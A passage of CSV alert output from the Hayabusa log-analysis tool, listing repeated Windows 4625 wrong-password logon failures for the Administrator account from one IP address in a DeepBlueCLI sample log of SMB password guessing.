NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.448 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Ixw5XWC2frtrTUkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.495 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3v0NpzAp7io9gbZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.536 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AfOOiR2zO5xem9Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yiGtitRqZbGNKrtN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.623 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oQ70LvSMnGxBCFO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGHr8623vHZyMY5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.707 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: X5Y1C9A4XqxQGoVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SOnirLGOZzRVSt3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jLu7XtYCHPqVNE7u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.811 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w242Ei1CpWErEE4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.847 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UOZUagVG4R6zcK92 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.891 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hQOl8XV3Ydp8UcW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.927 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1XBRDfoN0I2iu6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.963 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngyknhk7uGvs38bG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.996 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXZUhLVsfRUBDcsu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.045 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VEDAtkhiSqUcLj2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4CmH02M91kHzeK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.125 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5St1kWrKP4PZlOIy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:13.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17A6k4Om84gunQfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.195 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9GfR4XdixrNJHny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 27JWPfEV4DgS1tNv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yNeJnXg1pyedSpqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.324 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WWihv14n9IAQXw2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gy19bFWzQFaQZRBa | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.412 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N28Ec4jkXkSNvsQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.447 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sD9qQWJbeukyPQbc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.487 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uoRSHXvwMeKg8cyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPEOhloL7vo1fTFQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: glbLglffka5JqQCN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7MTbgvYN6PIaKxeK | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAjWfgmGrm3o2mAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.683 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9EZYPG6uQtsez1UI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PRcnsdLAKd7enemG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.759 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUZEQaUavv7fWk4w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JKth56VEMqMCgwG9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.834 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
TCGlvOFFkVpSHSoM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmLxSIastsvqdJC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.895 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPyvUDHHWzbhyvZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.935 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7dF4fIlAvIBYiw0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPDPtH2m9TgW8Khg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AChGHCNom0ds5ujV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 8sLQI4KGgQRq2Sy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dqeLFLRT5EXiCBUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dx3tco9up7XnOa7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.159 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZdNX4ubtpQaV9EeF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.189 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S05I0ZlGKGazkVkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzbfrYSYhxH6WcCt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.304 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: ZGTvXs8Mlc0Fi7iT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.345 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1LjtTFjPfPlBqAi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lhJW3iO1xGGTMhp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.427 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMz7WmlBTgadVgN8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OB02epCA5pc5oBeJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.503 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KAFgReUMtu9VerRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.543 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: ByeL26yQfohpQT3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 527r3nh9ocmItXfL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNeC1BBFVXv839Ys | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.673 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: juXXpQcoPfJLMQ3L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.708 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: njNdv4lGnsUpooCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j6VchLhWJT7cCWVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.788 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r3xxnFpbd8zkFm0h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtf156NEpOebQHGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17O1jfGX6KQMPgnD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.905 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NaqTqrCiPPfNxZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.950 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Az7cwIWXUGVIMTv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Djaxf99PVs2VkMy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:15.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbTSoTdaQ0Y4c9Gw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g9aTo4QBHfrgPYZ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dpHKjYzZTn0ruIrf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HqhPnV6tc8airRqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.211 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RIOCqtXh5ji12U5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.254 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwuGZ0kgg1yToLlr | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.289 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZSBbd4qBRuzeKBjD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zS1Muxc9gpcqv23 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c6wiIkfkgtso42P1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1ilRmhSB5RfvpVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PuQ47GGBraimypWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UfUsAYWilbwMScpE | IP Addr: 
